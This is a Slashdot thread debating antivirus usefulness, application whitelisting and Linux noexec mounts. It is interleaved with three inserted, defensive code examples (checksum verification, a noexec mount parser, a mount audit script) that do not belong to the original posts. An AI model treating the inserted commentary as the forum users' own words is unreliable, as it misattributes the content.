      A windows program I'm remarkably happy using is Eset's NOD32 (or even its Security Suite). Very little in terms of resource footprint and very fast. It gets pretty decent writeups too. Best I've found so far (and I've used quite a few - and beta tested more....)

    7. Re:running multiple antiviruses by jonbryce · · Score: 1

      Not only that, but the two virus checkers would insist on scanning each other before letting the other scan the file, and probably before allowing each other to scan each other.

    8. Re:running multiple antiviruses by Opportunist · · Score: 1

      Then you won't run Windows and won't need it in the first place.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    9. Re:running multiple antiviruses by martin-boundary · · Score: 1

      You'd have to run a custom stripped down OS with only the processes you're sure you want running. That would rock. Of course, it could be _always_ cheaper to run a Beowulf cluster, eg when 16 processor desktop systems are standard, just get two 8 processor systems without the redundant monitors etc.

    10. Re:running multiple antiviruses by Tony+Hoyle · · Score: 1

      The problem with nod32 is it interferes with the tcp/ip stack and stops lots of programs working.

      What the hell it's doing even hooking into it is beyond me.. it's just feature creep.. it should be checking opened files only.

    11. Re:running multiple antiviruses by zrq · · Score: 1

      I think that is what MrMr was getting at.

      If the dominant desktop OS requires that amount of cpu power to run all the antivirus stuff and still get things done, then it will push down the price of multicore mega compute platforms. Those of us who choose to run an alternative OS that doesn't need all the extra antivirus stuff would still benefit from lower prices of multicore mega compute platforms and would be able to do more real work with them*.

      Same sort of thing is happening with games. I don't play 3D games, but my Linux desktop machine looks real nice with Compiz/Beryl and OpenGL running on a high powered graphics processor that would have been way out of my budget a few years ago. The push to get better and better 3D graphics in games has lowered the cost of the high powered graphics processors to the point where they become standard kit for our desktop machines.

      * Ok, when I say 'real work', on most systems a lot of the extra compute power will be used to draw prettier 3D folding sliding bouncing windows in the UI. But having that amount of cheap compute power on servers will mean the boring nerds amongst us will be able to handle larger data sets and do more processing.

  8. Just dont do it... by Dishevel · · Score: 4, Interesting

    Just don't have AV's installed at all. Not having AV installed on my system keeps me from even thinking of trying anything stupid. Every month or so I download a free trial of a Non Norton / Non McAfee AV program, update it and run a full scan. Then I do the same with a different one. Then I repeat with Spyware/malware programs. All that has ever been found is a few cookies. Safety through not doing stupid shit.

    --
    Why is it so hard to only have politicians for a few years, then have them go away?
    1. Re:Just dont do it... by jimicus · · Score: 1

      That might work for the average /.'er on a single PC on its own.

      It doesn't work in an office full of people, and it doesn't work with the average /.'ers grandma.

    2. Re:Just dont do it... by Anonymous Coward · · Score: 0

      Too much like rock climbing with no safety line.

      What happens when you want to examine that xxx.jpg.vbs file on your friend's ipod, but accidentally run it instead of opening it..? You're screwed and have to reinstall, while any decent antivirus package would have kept it from running.

      Common sense is the first, best, line of defense, but putting all your eggs in one basket isn't such a great idea.

    3. Re:Just dont do it... by Opportunist · · Score: 1

      Now, of course I have an ulterior motive for saying that, but I wouldn't want to see what happens when the general population follows that advice (not only because it would most likely mean I have to find me a job where I actually have to work for my money).

      You might not need an AV tool. You don't click every stupid button, open every attachment labeled "important info from your bank" or "last reminder", but you'd be amazed how many do.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    4. Re:Just dont do it... by Tony+Hoyle · · Score: 1

      In an office full of people they won't have admin rights and the system policies would have locked down any ability to install anything.. so AV isn't an issue there either. All it'll do is slow them down and cause random BSODs, program failures etc.

    5. Re:Just dont do it... by zerocool^ · · Score: 1


      FREE ENTERPRISE-GRADE ANTIVIRUS SCAN

      1.) go to Trend Micro's download page
      2.) lower right side, click "Damage Cleanup Engine", and download sysclean.com:
      "If you are not a Trend Micro customer please download the following file.
      Sysclean Package 3.2MB
      MD5 checksum: 4cb85b5a3c097fcb494dceed216b8d9e"
      3.) go back to the download page, lower right side, click "Trend Micro pattern files"
      4.) download the latest official or controlled (beta) virus defs.
      5.) stick these on a usb key, reboot in safe mode, copy to the desktop, place both files in the same folder, and run it.

      Trend Micro's end user virus protection is not that great, it is bloated and annoying like most end user antivirus. But their enterprise product is SUPERB.

      This, coupled with HijackThis (also now a Trend Micro product) and a good dose of Spybot and AdAware Personal will clean 99.9% of systems in safe mode, first time.

      ~Wx

      --
      sig?
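Step 2 of the post above publishes an MD5 checksum next to the download; checking it before booting into safe mode and running the file is the part people skip. Added example, not code from the post or from Trend Micro: it hashes a downloaded file in chunks and compares the result with the published value. The MD5 string is the one the post lists for the Sysclean package; the sample file is constructed here, so its own digest is computed on the spot rather than taken from the page.

```python
"""Verify a download against its published checksum before running it.

Added example; not code from the post or from Trend Micro. The MD5 value
below is the one the post lists for the Sysclean package. The sample file is
constructed here, so its digest is computed on the spot, not taken from the page.
"""
import hashlib
import hmac
import os
import tempfile

# Checksum as quoted in the post for "Sysclean Package 3.2MB" (page value).
PUBLISHED_SYSCLEAN_MD5 = "4cb85b5a3c097fcb494dceed216b8d9e"


def digest_bytes(data, algorithm="md5"):
    """Hex digest of an in-memory byte string."""
    return hashlib.new(algorithm, data).hexdigest()


def file_digest(path, algorithm="md5", chunk_size=1 << 20):
    """Hash a file in 1 MiB chunks so a large download need not fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def checksum_matches(path, expected_hex, algorithm="md5"):
    """True only when the file's digest equals the published one.

    Hex is compared case-insensitively, and with hmac.compare_digest so the
    comparison does not leak where the two strings first differ.
    """
    actual = file_digest(path, algorithm)
    return hmac.compare_digest(actual.lower(), expected_hex.strip().lower())


def demo():
    """Write a constructed 'package', then check it against a right and a wrong digest."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"constructed stand-in for a downloaded package\n" * 2000)
        path = tmp.name
    try:
        expected = file_digest(path)                     # what a vendor page would publish
        good = checksum_matches(path, expected.upper())  # case of the hex does not matter
        # The constructed file is not the real Sysclean, so the page value must not match.
        bad = checksum_matches(path, PUBLISHED_SYSCLEAN_MD5)
        return good, bad
    finally:
        os.remove(path)


if __name__ == "__main__":
    print(demo())  # (True, False)
```

MD5 is adequate for catching a corrupted or swapped download from a vendor page you already trust, but it is collision-prone; when a vendor publishes a SHA-256 value, pass `algorithm="sha256"` instead. The check is only as strong as the channel the checksum arrived over, which is why the post has you read it off the vendor's own download page rather than off the file's directory.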
    6. Re:Just dont do it... by Ephemeriis · · Score: 1

      Just don't have AV's installed at all. Not having AV installed on my system keeps me from even thinking of trying anything stupid. Every month or so I download a free trial of a Non Norton / Non McAfee AV program, update it and run a full scan. Then I do the same with a different one. Then I repeat with Spyware/malware programs. All that has ever been found is a few cookies. Safety through not doing stupid shit.
      That works fine for cautious and educated users... But it relies on the user not being stupid, which cannot be assumed in all cases.

      My wife and I do not run antivirus, and we're fine without it. I'll periodically download and run something free just to make sure we haven't picked up anything nasty - and as you said the worst I've ever seen is cookies and random adware. That does not work for my son though. Despite repeated warnings, disasters, punishment, and threats he will still click on something interesting looking that seems to be coming from one of his friends. For him I've had to set up a group policy that dramatically restricts what he can run (but I can't set him as a restricted user or else his games won't work) and we've got antivirus running constantly on his machine. It works relatively well, but I keep an image around just in case.

      At work we generally install antivirus of some sort on every single machine. Once you've got more than one or two people on a network you really can't assume that they're all computer savvy. Someone's going to click something they shouldn't and you're going to need to keep the nastiness from spreading. Good group policies and restricted users go a long way to reduce the damage that someone can do...but decent antivirus is still important.
      --
      "Work is the curse of the drinking classes." -Oscar Wilde
    7. Re:Just dont do it... by endlessoul · · Score: 1
      I'm a proponent of "Safety through not doing stupid shit," but I still have some sort of AV/Antimalware/Etc. It just pays to be safe, even if you think you're sure that where you are going is clean.

      My point is that average users don't know to do the things we do. They go on Myspace, they click on the spam emails, they click on the 'Urgent System Scan' craptastic popups. They simply don't know and most don't care to know the safe way to surf. They need an AV that works, which is the point of the article.

    8. Re:Just dont do it... by Anonymous Coward · · Score: 0

      Try this with him: 'you broke it, you FIX it; you don't fix it, you don't use it'. You are cleaning up his mess. Once he figures out that he will have to deal with it the problem will go away. Show him virtual machines too if he MUST try something out...

    9. Re:Just dont do it... by Sloppy · · Score: 1

      What happens when you want to examine that xxx.jpg.vbs file on your friend's ipod, but accidentally run it instead of opening it..?

      How did you accidentally run it? The iPod should be mounted as noexec, so first you had to copy the file from that filesystem to your home directory. Then you had to chmod u+x your copy of the file. Then you had to execute it. Even the dumbest user can't accidentally do all three of those things.

      You're screwed and have to reinstall

      And to get to that level of screwedness, you had to accidentally type su or sudo and a password, before you execute the malware. A fourth step, making the overall process even less likely to accidentally occur.

      Of course, everything I'm saying is based on a certain premise that we both know doesn't really apply in this case. So why are we pussy-footing around the real issue, by talking about user mistakes and virus scanners? We damn well know that the system was already compromised and designed to aid potential malware, from the very beginning, before that specific xxx.jpg.vbs threat presented itself. And we know how to repair it.

      The problem has been understood for many, many years. It has been solved. Those who willfully eschew the solution, shouldn't pretend that they're discussing solutions in good faith. The pretense is so transparent that it's comical.

      --
      As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
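The first of Sloppy's three steps is that the removable device is mounted noexec, so the kernel refuses to execute anything on it directly. Added example, not part of the post: a small parser for the /proc/mounts format (one line per mount: device, mountpoint, fstype, comma-separated options, dump, pass) that finds the mount covering a given path and reports whether noexec is set. The mount table below is constructed, not captured from a real machine, and the `/media/ipod` mountpoint is an assumed name.

```python
"""Report whether the filesystem holding a path is mounted noexec.

Added example, not from the post: it parses text in /proc/mounts format and
picks the mount that covers a given path, which is the check behind "the iPod
should be mounted as noexec". The sample table below is constructed.
"""
import os
import re

# Constructed /proc/mounts sample. A space inside a mountpoint appears as \040.
SAMPLE_MOUNTS = (
    "/dev/sda1 / ext3 rw,relatime,errors=remount-ro 0 0\n"
    "proc /proc proc rw,nosuid,nodev,noexec 0 0\n"
    "/dev/sdb1 /media/ipod vfat rw,nosuid,nodev,noexec,uid=1000,gid=1000,utf8 0 0\n"
    "/dev/sdc1 /media/usb\\040stick vfat rw,nosuid,nodev,uid=1000 0 0\n"
)


def _unescape(field):
    """Decode the octal escapes the kernel uses (\\040 space, \\011 tab, \\012 newline, \\134 backslash)."""
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)


def parse_mounts(text):
    """Turn /proc/mounts text into a list of mount records with an options set."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # blank or truncated line
        device, mountpoint, fstype, options = parts[:4]
        mounts.append({
            "device": _unescape(device),
            "mountpoint": _unescape(mountpoint),
            "fstype": fstype,
            "options": set(options.split(",")),
        })
    return mounts


def mount_for_path(path, mounts):
    """The mount whose mountpoint is the longest prefix of path (None if no match)."""
    path = os.path.normpath(path)
    best = None
    for m in mounts:
        mp = m["mountpoint"]
        # "/media/ipod" must cover "/media/ipod/x" but not "/media/ipodx/x".
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best["mountpoint"]):
                best = m
    return best


def is_noexec(path, mounts_text=SAMPLE_MOUNTS):
    """True if a direct execve of a file at path would be refused because of noexec."""
    m = mount_for_path(path, parse_mounts(mounts_text))
    return m is not None and "noexec" in m["options"]


def is_noexec_on_this_host(path):
    """Same check against the live table (Linux only; /proc/mounts must exist)."""
    with open("/proc/mounts") as fh:
        return is_noexec(path, fh.read())


if __name__ == "__main__":
    for p in ("/media/ipod/xxx.jpg.vbs", "/home/user/xxx.jpg.vbs", "/media/usb stick/xxx.jpg.vbs"):
        print(p, "noexec" if is_noexec(p) else "executable")
```

One caveat when relying on this as a layer: noexec blocks the kernel from executing a file on that filesystem directly, not an interpreter from reading it, so it is exactly what Sloppy says it is, the first of several hurdles rather than the whole defence.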
    10. Re:Just dont do it... by sciencewhiz · · Score: 1

      By the time you install an antivirus a month later, the rootkit you ran had already hidden everything deep enough that the antivirus won't find it.

  9. The glass is half-empty? by Anonymous Coward · · Score: 1, Interesting

    An optimist would say that virus effectiveness has gone up.

    1. Re:The glass is half-empty? by Opportunist · · Score: 1

      An Opportunist would say that heuristics are overrated and that he told you all so for years, and that he decided years ago already to move away from a dated way of detecting malware.

      Mostly because the heuristics in his tool really sucked to begin with. :)

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    2. Re:The glass is half-empty? by cp.tar · · Score: 1

      So what would an Opportunist recommend?

      --
      Ignore this signature. By order.
    3. Re:The glass is half-empty? by Opportunist · · Score: 1

      An Opportunist would most likely recommend the product of a company he works for. :)

      Seriously now. This is akin to the question "What kind of computer do you suggest?" It depends on you, what you want to do with it, what your requirements are and in this case also where you live. As I've stated elsewhere, local companies are usually better at dealing with localized threats, which make up the majority of today's ID theft malware. Mostly because it makes no sense for the attackers to send malware targeting some bank in Sweden to Australian internet users. It only means you'll be more easily detected, because it increases the chance to hit a honeypot. There is also a good chance that they have good connections to local finance services (financial services usually don't really want to take their problems abroad and risk bad press when too many people know about it), meaning that even if something escapes their eyes initially, they will get a heads-up from that angle.

      What I would recommend is to take a look at AV companies around your area. Often the local ones are also the better ones for home users, for three reasons. They usually don't have large corporations as their main clients (i.e. making you and your copy insignificant, and making false positives in copy protections of games a non-issue because their corporate clients actually either don't care or outright want games to be found as malware), they react better to local threats and most of all they are usually also much faster to react to changes, simply due to their (normally) smaller size. And changes happen fast in this industry. What was state of the art half a year ago is obsolete today.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    4. Re:The glass is half-empty? by cp.tar · · Score: 1

      Well, you'd specifically mentioned you recommended other things, so I was curious...

      As for me, leaving aside the fact that I'm mostly running Linux and OS X, I can't look at any AV companies in my area: there are none.
      The market would be too small and way too cheap.
      And among all the spam I get -- and since I don't hide my e-mail address, I get tons of it (helping Google evolve spam detection algorithms) -- I have yet to see a phishing mail spoofing a Croatian bank.
      We mostly get threats that are a bit more global.

      I do find the idea of whitelisting software intriguing, and definitely worth considering among business users at the very least.

      --
      Ignore this signature. By order.
  10. User awareness is key by Anonymous Coward · · Score: 1, Interesting

    The main reason for virus infections, as far as I can see, is because of people simply executing untrusted programs: downloading rubbish toolbars, screen savers and opening e-mail attachments which say "Pam Anderson Naked.exe". I think more "sophisticated" means of infection, such as buffer-overflows or browser bugs are relatively less prevalent than the simple act of directly executing a trojan program and infecting yourself (not that I have statistics to back me up).

    Personally, I don't use an anti-virus product (at least, I don't have one running continuously, bogging the system down). My protection mechanism is to simply not run programs I don't trust and also have the latest updates installed. In the rare event that I do need to run an untrusted executable, I run a manual scan on it.

    After giving up the temptation to run these rubbish programs, I haven't been infected by a virus in years.

  11. Virus? by hax0r_this · · Score: 1

    Are viruses really still a big deal? My impression for the last few years has been that even windows has gotten to the point where you basically have to grant a virus permission at some point along the line. I haven't used an anti virus in years and to my knowledge my windows installations are all clean (I do check them periodically with that Trend Micro online scanner dealie).

    1. Re:Virus? by Barny · · Score: 3, Informative

      Yeah, now that world + dog uses a NAT router for their broadband and the lack of kazaa, viruses and worms are a dying breed. We swapped them for intrusive spyware and identity theft-ware that is much harder to get rid of and, thanks to the wonders of social engineering, much harder to stop joe-sixpack from getting :/

      --
      ...
      /me sighs
    2. Re:Virus? by ConceptJunkie · · Score: 1

      If you're using Vista, that's probably true, but after the first thousand times, giving a program permission to run becomes a reflex and no one will pay attention to it any more, and the one thing Microsoft actually seems to have accomplished with Vista, improved security, becomes moot. Thanks, Microsoft, you managed to invest about as much time and energy into Vista as the entire Apollo program and have nothing to show for it.

      --
      You are in a maze of twisty little passages, all alike.
    3. Re:Virus? by jonbryce · · Score: 1

      Yes, but given that you need to give the computer permission to delete a desktop icon (if it is in the "all users" folder), most users will just grant permission whenever it is requested.

    4. Re:Virus? by dave562 · · Score: 1

      Sadly they are. I'm running a fully patched XP box with IE7 as my browser and I almost got hit with a virus earlier this week. I went to a website that I visit all the time and it was compromised. It loaded a malicious script that popped up one of those annoying windows, "Your computer is infected with malware, do you want to clean it? Yes/Cancel." At that point I knew things were already bad so I opened Process Explorer and killed the IE process. Simply killing the process dropped a trojan downloader into my IE temp directory. Symantec AV caught the downloader at that point. If I hadn't had AV on the box it would be owned right now.

  12. Re:I don't have to worry about viruses on the web by Valdrax · · Score: 2, Funny

    Still get RSI though.

    That's 'cause you got arrogant and didn't properly firewall your hand before connecting it to the net.

    --
    If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").
  13. Consider Application and Device White-listing by Anonymous Coward · · Score: 1, Insightful
    Increasingly I'm recommending Application White-listing as a way to lift oneself out of the never-ending struggle against viruses and malware. Now there are several companies offering solutions to the problem (personal favorite is Trinamo). It won't suit every company or user since it requires an IT security function with some power and an understanding user community, but white-listing is more and more becoming an accepted method for dealing with some of IT's unsolved problems.

    AG

  14. F-Secure Deepguard 2.0 by Dtyst · · Score: 1

    I'm not surprised that F-Secure did so well in the behavioural blocking test. F-Secure Deepguard is amazing in recognizing malware application behavior even if it's not a known virus. Truly a nice advancement in virus prevention. Let's hope the competition gets as good as well.

  15. Antivirus is just bandaid. by miffo.swe · · Score: 2, Insightful

    The real problem is that it's possible to just click on random stuff from mail, on the web and in IM clients and it gets installed. Because it's such a big source of malware it shouldn't be done at all really. Much malware uses defects in browsers and the OS, and Antivirus is not a solution at all to those problems. It's not even a bandaid then.

    What I would like to see is Microsoft shipping a Windows version that's fairly secure out of the box. Then and only then Antivirus becomes something useful as a second added security layer. As it is now, when it is the only security layer, it doesn't work. Shipping Antivirus with Windows as Microsoft does is not a good solution but rather a recognition that they are not capable of delivering a fairly secure OS at all.

    If users get infected a lot by clicking the wrong things, the sane thing would be to disable that function or at least make it safer. Like demanding, for example, that a site that installs software is trusted by a third party.

    --
    HTTP/1.1 400
    1. Re:Antivirus is just bandaid. by cdrguru · · Score: 1

      How do you make a computer that is administered by a fool (er, a user) "fairly secure?" It cannot possibly be secure because the administrator does not know what should be done and what should not be done.

      When they click on Weatherbug to install it because they think this is something they want, who is there to tell them they cannot do this? They want to install new and cool software on their computer. Preventing them from doing this is the only path to security there is - if you allow them to install Weatherbug, they can install anything, including trojans and malware.

      Sorry, for 99% of the people using computers they do not need or want a computer - they want an appliance that serves up entertainment and email. Nothing more.

    2. Re:Antivirus is just bandaid. by toddestan · · Score: 1

      What I would like to see is Microsoft shipping a Windows version that's fairly secure out of the box. Then and only then Antivirus becomes something useful as a second added security layer. As it is now, when it is the only security layer, it doesn't work. Shipping Antivirus with Windows as Microsoft does is not a good solution but rather a recognition that they are not capable of delivering a fairly secure OS at all.

      Where have you been for the past year? Microsoft has been shipping a version of Windows that's fairly secure out of the box. It's called Vista. You may argue that the implementation may suck in the sense that it annoys the user, but it's basically doing the same thing that other OSes do.

  16. read Ranum on enumerating badness .. by rs232 · · Score: 3, Informative

    Why are we still talking about this in late 2007? What have the supreme innovators been doing the past decade? Ranum laid out the solution here:

    "if I were to simply track the 30 pieces of Goodness on my machine, and allow nothing else to run, I would have simultaneously solved the following problems":

    * Spyware
    * Viruses
    * Remote Control Trojans
    * Exploits that involve executing pre-installed code that you don't use regularly

    --
    davecb5620@gmail.com
    1. Re:read Ranum on enumerating badness .. by QuantumG · · Score: 1

      Blah, the real solution is to have open software that you can trust because everyone knows you could look inside it so they don't try to sneak something past. If you can't have that, at least run every program in a separate virtual machine and only allow a program access to the documents it requires to have access to instead of giving it full control to do anything on the system, including modifying the kernel, which is what 99% of Windows users do.

      --
      How we know is more important than what we know.
    2. Re:read Ranum on enumerating badness .. by darthflo · · Score: 1

      Open software is fine and all, but would you mind finally giving up the "I can look inside, so it's secure" bull?
      In theory it works, but it's not practically employable. Most mainstream distros install binary packages. Even if source packages are available, did you check each and every changed line after each and every security update? Simple answer: Either you don't or your software's very outdated and thus probably vulnerable.
      Even given the benefit of the doubt (imagining you've got a whole team of people following the development process of every single program you use, closely monitoring each and every code check-in and the state of your respective distro's packages) your solution's not as secure as it may seem. Remember SquirrelMail?

    3. Re:read Ranum on enumerating badness .. by QuantumG · · Score: 3, Informative

      Meh, people can so you'll be leaving your big fat paw prints on it if you try. See, that's the cool bit. I can say "on line 2105 of blah.c in package foo version 4.321 I found that some fucker had tried to put in a backdoor.. can you guys check your revision control to see where this came from?" and there's this public audit trail. If I managed to find something in a binary that isn't in the source I can easily find out who made the package and where they got the binaries from. That's what security is.. it's people and accountability.

      --
      How we know is more important than what we know.
    4. Re:read Ranum on enumerating badness .. by Ephemeriis · · Score: 1

      if I were to simply track the 30 pieces of Goodness on my machine, and allow nothing else to run
      That is actually relatively do-able with group policies under Windows. You can create a list of things that you trust for execution and block just about everything else. If you had a fairly large IT department with the time and inclination to check every single executable component that users need this might actually be enough. The part where it all falls apart is the updates...

      Windows Updates aren't always terribly well documented. Some files get updated that you aren't told about, and suddenly something won't execute. Then you've got updates for all the other pieces of software that your users run... And you can't ignore all the updates because some of them are genuinely necessary. So you wind up having to dedicate an awful lot of time and effort to simply allowing your users to run what they need to.

      I tried such a draconian policy at home with my son's computer... It worked fine for about a month, and then I got sick of constantly adding new things to the trusted list. I have since gone to a more relaxed group policy and installed some decent antivirus on his machine. The combination has worked quite well.
      --
      "Work is the curse of the drinking classes." -Oscar Wilde
    5. Re:read Ranum on enumerating badness .. by cdrguru · · Score: 1

      The only way to correctly use open software is for the person using it to personally examine the code. What? The user can't understand C++? Well, they have no business using open software then if they can't personally check it out.

      This is a little harsh, but the problem is that if a user installs a binary package without checking it they are leaving themselves open to whatever the distributor allowed in. Distributors get compromised. Sure, this is eventually detected and some forum somewhere has 1,500 posts about it. But that does not mean that every user that downloaded it, trusted it and installed it gets informed.

      If you can't check it and do not know the history of what you are downloading, you shouldn't be downloading it.

      Same goes for any unsigned binary. If you can't go back to the publisher/author and know, absolutely, they are solely responsible for the binary you are using you cannot trust it. Unsigned code is untrustworthy. Period.

    6. Re:read Ranum on enumerating badness .. by cdrguru · · Score: 1

      Sure, you might be able to track something back. Can the other 1,000 people that downloaded a compromised binary? I doubt it. Are you going to tell them? No, you might post it somewhere in some forum or blog but how do the other "users" know about this?

      Reading Slashdot?

    7. Re:read Ranum on enumerating badness .. by QuantumG · · Score: 1

      Are you stupid or what? The distro just sends out another package.

      --
      How we know is more important than what we know.
  17. solution for real protection .. by rs232 · · Score: 1

    Use a Linux desktop distro, disable exec on the /home and /tmp directories, don't allow users to install software, case closed ..

    Yes, I know what you're going to say, there aren't any Linux viruses because there aren't many Linux desktops out there. But where are all the server exploits out there being actively used in the wild? I'm talking about commercial servers being hacked not some msging board ..

    --
    davecb5620@gmail.com
    1. Re:solution for real protection .. by QuantumG · · Score: 1

      If you honestly think that servers don't get hacked then you probably should go talk to a security sysadmin or two.

      The trade in zero day exploits is alive and well.. the only difference between today and 10 years ago is that the sale of zero day exploits has become slightly more legitimized. i.e., the "good guys" will now buy a zero day exploit off anyone selling, not just the "bad guys".

      But getting back to the topic, you don't need exploits to write a virus. What you need is an infection vector, the user will do the rest. Thankfully, Linux users don't tend to download "warez" or open executable email attachments or even have software that requires you to install a "plugin" before you can view porn. What you said about disabling exec on /home and /tmp is a good way to remove those first two infection vectors. It's even practical - if you have virtualization software installed on the machine. Someone complains they can't run random shit they downloaded off the internet? (or wrote themselves) Tell them to run it in a virtual machine.

      --
      How we know is more important than what we know.
    2. Re:solution for real protection .. by darthflo · · Score: 1

      Use Windows, only allow the programs* needed to be run (via GPO), case closed ..

      * An execution white- or blacklist can be created with hashes or executable file names. Obviously don't use the latter possibility.

    3. Re:solution for real protection .. by rs232 · · Score: 1

      "If you honestly think that servers don't get hacked then you probably should go talk to a security sysadmin or two"

      Can I have some real world examples, not some home box, but commercial servers being hacked and customer records stolen, like the TJ Maxx case ..

      --
      davecb5620@gmail.com
    4. Re:solution for real protection .. by QuantumG · · Score: 1

      Dude, it happens every day. That's why it isn't news. As I said, go talk to a security sysadmin or two.

      --
      How we know is more important than what we know.
    5. Re:solution for real protection .. by SCHecklerX · · Score: 1

      Yes, I know what you're going to say, there aren't any Linux viruses because there aren't many Linux desktops out there. But where are all the server exploits out there being actively used in the wild. I'm talking about commercial servers being hacked not some msging board ..
      It happens all the time. Usually through unpatched software, or misconfigured apache servers. The security team responsible for the DMZ network and firewall rules usually has no power over the guys who administer and program the systems.
    6. Re:solution for real protection .. by rs232 · · Score: 1

      "Dude, it happens every day. That's why it isn't news. As I said, go talk to a security sysadmin or two"

      In other words no, you can't produce any real world examples, dude ..

      --
      davecb5620@gmail.com
    7. Re:solution for real protection .. by QuantumG · · Score: 1

      So just so I have your logic straight:

      1. You think something that isn't remarkable is newsworthy.
      2. There are few if any news stories about it.
      3. Therefore it doesn't happen.

      You're an idiot.

      I can give you real world examples, but as they are in the form "my mate who is a security sysadmin tells me..." I honestly think you'll appreciate them more if you go talk to your mates who are security sysadmins.

      --
      How we know is more important than what we know.
    8. Re:solution for real protection .. by Anonymous Coward · · Score: 0

      I'm a sysadmin and every company I've worked at has had at least one of their Linux servers hacked. I myself have had to deal with a variety of breakins over the 10 years I've done Linux.

      Linux gets hacked. Sorry if the truth hurts.

  18. Oh, I wouldn't need any of that, by laejoh · · Score: 0
  19. where are all the Linux server exploits .. by rs232 · · Score: 3, Insightful

    "The reason that Linux is largely unaffected is that it is not very widely used .. If/when we succeed in bringing Linux to the masses, this layer of protection will be torn away"

    If that were true, where are all the Linux server exploits being actively used in the wild? A Linux desktop logged in as standard user is safe from the numpties and is still usable. The dangers of screensavers wouldn't even apply here; even if a user managed to run some malware script it would most probably be confined to the user's home dir, the core system would remain immune.

    --
    davecb5620@gmail.com
    1. Re:where are all the Linux server exploits .. by keesh · · Score: 2, Informative

      Normal users on a Unix system have more than enough privileges to send out a million emails a day.

    2. Re:where are all the Linux server exploits .. by jimicus · · Score: 3, Insightful

      Oh, there's plenty of Linux server exploits. Most depend on specific applications (eg. bind, sendmail), misconfigurations or both.

      The other thing you have to look out for is web applications - which of course tend to be exploitable regardless of what OS is running the website. These are notorious for providing holes. If you're lucky, all that happens is your website is replaced with a single page which says "pwn3d! l053rz!".

      If you're unlucky, you get to announce to the world that you've lost the credit card details of 20,000 people.

      (This, by the way, is not drastically different from the current state of security in Windows Server. A careless administrator is probably the biggest security hole known to IT).

    3. Re:where are all the Linux server exploits .. by FireFury03 · · Score: 4, Informative

      If that were true, where are all the Linux server exploits being actively used in the wild?

      Linux server exploits _are_ being actively used in the wild. If you don't keep your server patched up then you stand a pretty good chance of being rootkitted. However, Linux distros tend to be pretty hot on security updates, meaning that a fully up to date system has very few known security holes. I suspect there are also more "idiot" server admins in charge of Windows servers than Linux servers (that is not to say that Windows admins are idiots, I just suspect there is a higher proportion of clued up admins in the Linux world).

      However, the server world is very different from the desktop world - in the server world you can be relatively trustful that the admin won't go and install some random shiny new screensaver, etc. whereas on the desktop most people are not (and do not have access to) qualified admins.

      A Linux desktop logged in as standard user is safe from the numpties and is still usable. The dangers of screensavers wouldn't even apply here; even if a user managed to run some malware script it would most probably be confined to the users home dir, the core system would remain immune.

      There are a couple of important points here though:

      1. Your average home user does _not_ have a dedicated sysadmin. When they want to install a package they (generally) need to become root to do it - that means that the numpties are equally capable of installing screensavers^Wmalware under Linux as they are under Windows. The thing the privilege separation gets you is that you can't _accidentally_ install something as root (e.g. via an exploit in your browser / mail client / whatever).

      2. Even without root, a user still usually has plenty of permissions to do some evil things. They can't do some particularly bad things like SYN floods but they can still send out millions of emails and compromise other hosts.

      3. Is the protection of the "core system" actually that important when you have a single user machine and so all the important data is owned by that user? The only thing this really gets you is the knowledge that your system binaries are probably safe (so you can trust that ps, netstat, etc are giving you accurate results rather than hiding the malware that is running).

      There may be some merit in mounting all the filesystems the normal user can write to as "noexec" so that malware can't just install itself and run as the normal user. But this may place too much of a limit on usability and most distros certainly don't do this by default today.
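      The noexec idea raised by rs232 and QuantumG above and qualified here by FireFury03 can be checked mechanically. The following is an added example, not code from any post in this thread: it reads a mount table in /proc/mounts format and reports the user-writable mount points that lack the option. The list of mount points is an assumption (the thread names /home and /tmp; /var/tmp and /dev/shm are added as common extras).

```shell
#!/bin/sh
# Added example, not from any post in this thread: audit a /proc/mounts-style
# mount table for user-writable mount points that are missing "noexec".
#
# An fstab line that gives /tmp the options discussed in the thread looks like:
#   tmpfs  /tmp  tmpfs  defaults,nosuid,nodev,noexec  0 0

# Mount points to check (assumption: the thread names /home and /tmp;
# /var/tmp and /dev/shm are added here as common user-writable extras).
USER_WRITABLE_MOUNTS="/home /tmp /var/tmp /dev/shm"

# audit_noexec: reads lines in /proc/mounts format
# ("device mountpoint fstype options dump pass") on stdin.
# Prints one line per listed mount point that lacks noexec.
# Returns 0 when nothing was found, 1 otherwise.
audit_noexec() {
    found=0
    while read -r dev mnt fstype opts rest; do
        [ -n "$mnt" ] || continue            # skip blank lines
        for want in $USER_WRITABLE_MOUNTS; do
            [ "$mnt" = "$want" ] || continue
            # Surround with commas so "noexec" cannot match inside another option.
            case ",$opts," in
                *,noexec,*) ;;               # option present: nothing to report
                *) printf 'MISSING noexec: %s (%s)\n' "$mnt" "$opts"
                   found=1 ;;
            esac
        done
    done
    return "$found"
}

# Live use on a Linux box (commented out so the example runs anywhere):
# audit_noexec < /proc/mounts
```

      Note that noexec only refuses direct execution of files on that filesystem; a script handed to an interpreter still runs, and installers that stage files in /tmp are the usual casualty, which is the usability limit FireFury03 mentions.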

    4. Re:where are all the Linux server exploits .. by cheater512 · · Score: 1

      Granted but it's significantly easier to clean such infections (they cannot hide as easily), it only affects that one user on a multi user system and it cannot infect the core system.
      If the user doesn't log in, then the malware cannot run.

    5. Re:where are all the Linux server exploits .. by JGJones · · Score: 1

      the core system would remain immune - true...but for a typical home user - the core system is the least of their worries - they care more about their own files - photo collection etc etc. If there's a script that basically nukes their /home - they're not gonna say "gee that's OK as long as my core system is fine..." Granted most viruses are after zombie PC's etc, in this respect I agree.

    6. Re:where are all the Linux server exploits .. by Knuckles · · Score: 2, Insightful

      Well, they should have backups. I mean really, it's the same as the hd dying or something.

      --
